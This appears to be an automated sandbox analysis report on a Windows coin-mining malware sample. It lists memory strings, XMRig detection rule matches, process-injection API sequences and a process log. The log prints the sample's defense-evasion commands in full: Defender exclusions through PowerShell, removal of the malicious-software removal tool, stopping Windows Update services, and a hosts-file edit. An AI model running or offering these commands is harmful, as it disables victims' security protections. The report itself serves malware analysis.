            Source: lsass.exe, 00000022.00000002.2578503702.000002A29139C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000003.1496236329.000002A2913F6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
            Source: lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2578713506.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A2913A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
            Source: updater.exe, 00000025.00000003.1419565451.000001A38C040000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
            Source: updater.exe, 00000025.00000003.1419565451.000001A38C040000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
            Source: updater.exe, 00000025.00000003.1419565451.000001A38C040000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
            Source: updater.exe, 00000025.00000003.1419565451.000001A38C040000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
            Source: lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2578713506.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A2913A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: lsass.exe, 00000022.00000002.2578503702.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A291385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
            Source: lsass.exe, 00000022.00000002.2577979722.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1391816998.000002A2912D9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: lsass.exe, 00000022.00000002.2578503702.000002A29139C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000003.1496236329.000002A2913F6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
            Source: lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2578713506.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A2913A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
            Source: lsass.exe, 00000022.00000000.1391816998.000002A2912D9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: lsass.exe, 00000022.00000002.2577979722.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1391816998.000002A2912D9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2578713506.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A2913A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
            Source: lsass.exe, 00000022.00000000.1388820584.000002A290A88000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575794630.000002A290A88000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: lsass.exe, 00000022.00000002.2575965021.000002A290AC4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388858910.000002A290AC4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
            Source: lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
            Source: lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
            Source: lsass.exe, 00000022.00000002.2578503702.000002A29139C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2578503702.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2578713506.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000003.1496236329.000002A2913F6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2577979722.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A2913A2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1391816998.000002A2912D9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: lsass.exe, 00000022.00000000.1391816998.000002A2912D9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2578713506.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A2913A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
            Source: lsass.exe, 00000022.00000000.1388820584.000002A290A88000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1391816998.000002A2912D9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
            Source: lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
            Source: lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
            Source: lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
            Source: lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
            Source: lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2578713506.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A2913A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Modifies the hosts file
            Source: C:\Users\user\Desktop\file.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
            Source: 00000041.00000002.2571106481.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Uses powercfg.exe to modify the power settings
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Windows\System32\dialer.exeCode function: 25_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,25_2_00000001400010C0
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BC28C8 NtEnumerateValueKey,NtEnumerateValueKey,31_2_000001F385BC28C8
            Source: C:\Windows\System32\lsass.exeCode function: 34_2_000002A29199202C NtQuerySystemInformation,StrCmpNIW,34_2_000002A29199202C
            Source: C:\Windows\System32\lsass.exeCode function: 34_2_000002A29199253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,34_2_000002A29199253C
            Source: C:\Windows\System32\dwm.exeCode function: 41_2_00000283E0F428C8 NtEnumerateValueKey,NtEnumerateValueKey,41_2_00000283E0F428C8
            Source: C:\Windows\System32\dialer.exeCode function: 63_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,63_2_00000001400010C0
            Source: C:\Windows\System32\dialer.exeCode function: 64_2_0000000140001394 NtQueryAttributesFile,64_2_0000000140001394
            Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\lwouyklykeoh.sysJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_1jmsi3d4.uxf.ps1Jump to behavior
            Source: C:\Windows\System32\dialer.exeCode function: 25_2_000000014000226C25_2_000000014000226C
            Source: C:\Windows\System32\dialer.exeCode function: 25_2_00000001400014D825_2_00000001400014D8
            Source: C:\Windows\System32\dialer.exeCode function: 25_2_000000014000256025_2_0000000140002560
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BA38A831_2_000001F385BA38A8
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385B9D0E031_2_000001F385B9D0E0
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385B91F2C31_2_000001F385B91F2C
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BD44A831_2_000001F385BD44A8
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BCDCE031_2_000001F385BCDCE0
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BC2B2C31_2_000001F385BC2B2C
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BFD0E031_2_000001F385BFD0E0
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385C038A831_2_000001F385C038A8
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BF1F2C31_2_000001F385BF1F2C
            Source: C:\Windows\System32\lsass.exeCode function: 34_2_000002A2911C1F2C34_2_000002A2911C1F2C
            Source: C:\Windows\System32\lsass.exeCode function: 34_2_000002A2911D38A834_2_000002A2911D38A8
            Source: C:\Windows\System32\lsass.exeCode function: 34_2_000002A2911CD0E034_2_000002A2911CD0E0
            Source: C:\Windows\System32\lsass.exeCode function: 34_2_000002A291992B2C34_2_000002A291992B2C
            Source: C:\Windows\System32\lsass.exeCode function: 34_2_000002A2919A44A834_2_000002A2919A44A8
            Source: C:\Windows\System32\lsass.exeCode function: 34_2_000002A29199DCE034_2_000002A29199DCE0
            Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E255DD0E040_2_0000014E255DD0E0
            Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E255E38A840_2_0000014E255E38A8
            Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E255D1F2C40_2_0000014E255D1F2C
            Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25EDDCE040_2_0000014E25EDDCE0
            Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25EE44A840_2_0000014E25EE44A8
            Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25ED2B2C40_2_0000014E25ED2B2C
            Source: C:\Windows\System32\dwm.exeCode function: 41_2_00000283E0F11F2C41_2_00000283E0F11F2C
            Source: C:\Windows\System32\dwm.exeCode function: 41_2_00000283E0F1D0E041_2_00000283E0F1D0E0
            Source: C:\Windows\System32\dwm.exeCode function: 41_2_00000283E0F238A841_2_00000283E0F238A8
            Source: C:\Windows\System32\dwm.exeCode function: 41_2_00000283E0F42B2C41_2_00000283E0F42B2C
            Source: C:\Windows\System32\dwm.exeCode function: 41_2_00000283E0F4DCE041_2_00000283E0F4DCE0
            Source: C:\Windows\System32\dwm.exeCode function: 41_2_00000283E0F544A841_2_00000283E0F544A8
            Source: C:\Windows\System32\dialer.exeCode function: 63_2_000000014000226C63_2_000000014000226C
            Source: C:\Windows\System32\dialer.exeCode function: 63_2_00000001400014D863_2_00000001400014D8
            Source: C:\Windows\System32\dialer.exeCode function: 63_2_000000014000256063_2_0000000140002560
            Source: C:\Windows\System32\dialer.exeCode function: 64_2_000000014000325064_2_0000000140003250
            Source: C:\Windows\System32\dialer.exeCode function: 64_2_00000001400027D064_2_00000001400027D0
            Source: C:\Windows\System32\svchost.exeCode function: 66_2_000001FB539A38A866_2_000001FB539A38A8
            Source: C:\Windows\System32\svchost.exeCode function: 66_2_000001FB5399D0E066_2_000001FB5399D0E0
            Source: C:\Windows\System32\svchost.exeCode function: 66_2_000001FB53991F2C66_2_000001FB53991F2C
            Source: C:\Windows\System32\svchost.exeCode function: 66_2_000001FB539D44A866_2_000001FB539D44A8
            Source: C:\Windows\System32\svchost.exeCode function: 66_2_000001FB539CDCE066_2_000001FB539CDCE0
            Source: C:\Windows\System32\svchost.exeCode function: 66_2_000001FB539C2B2C66_2_000001FB539C2B2C
            Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001CBD8BB38A867_2_000001CBD8BB38A8
            Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001CBD8BAD0E067_2_000001CBD8BAD0E0
            Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001CBD8BA1F2C67_2_000001CBD8BA1F2C
            Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001CBD8BE44A867_2_000001CBD8BE44A8
            Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001CBD8BDDCE067_2_000001CBD8BDDCE0
            Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001CBD8BD2B2C67_2_000001CBD8BD2B2C
            Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001F2BD13D0E068_2_000001F2BD13D0E0
            Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001F2BD1438A868_2_000001F2BD1438A8
            Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001F2BD131F2C68_2_000001F2BD131F2C
            Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001F2BD16DCE068_2_000001F2BD16DCE0
            Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001F2BD1744A868_2_000001F2BD1744A8
            Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001F2BD162B2C68_2_000001F2BD162B2C
            Source: C:\Windows\System32\svchost.exeCode function: 69_2_00000229F8B71F2C69_2_00000229F8B71F2C
            Source: C:\Windows\System32\svchost.exeCode function: 69_2_00000229F8B838A869_2_00000229F8B838A8
            Source: C:\Windows\System32\svchost.exeCode function: 69_2_00000229F8B7D0E069_2_00000229F8B7D0E0
            Source: C:\Windows\System32\svchost.exeCode function: 69_2_00000229F8BA2B2C69_2_00000229F8BA2B2C
            Source: C:\Windows\System32\svchost.exeCode function: 69_2_00000229F8BB44A869_2_00000229F8BB44A8
            Source: C:\Windows\System32\svchost.exeCode function: 69_2_00000229F8BADCE069_2_00000229F8BADCE0
            Source: Joe Sandbox ViewDropped File: C:\ProgramData\Google\Chrome\updater.exe FDE56E00761A85AD495BD2D05654F3657922F665F58EDFABCF43D2FA769F0D79
            Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\lwouyklykeoh.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
            Source: 00000041.00000002.2571106481.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: classification engineClassification label: mal100.adwa.spyw.evad.mine.winEXE@90/13@1/2
            Source: C:\Windows\System32\dialer.exeCode function: 25_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,25_2_000000014000226C
            Source: C:\Windows\System32\dialer.exeCode function: 63_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,63_2_000000014000226C
            Source: C:\Windows\System32\dialer.exeCode function: 25_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,25_2_00000001400019C4
            Source: C:\Windows\System32\dialer.exeCode function: 25_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,25_2_000000014000226C
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8080:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7812:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8088:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3168:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7980:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8024:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8160:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7448:120:WilError_03
            Source: C:\Windows\System32\dialer.exeMutant created: \BaseNamedObjects\Global\ihmypisetxdrqeze
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7764:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8072:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6252:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:344:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3788:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7972:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8152:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzv5kr52.ld5.ps1Jump to behavior
            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
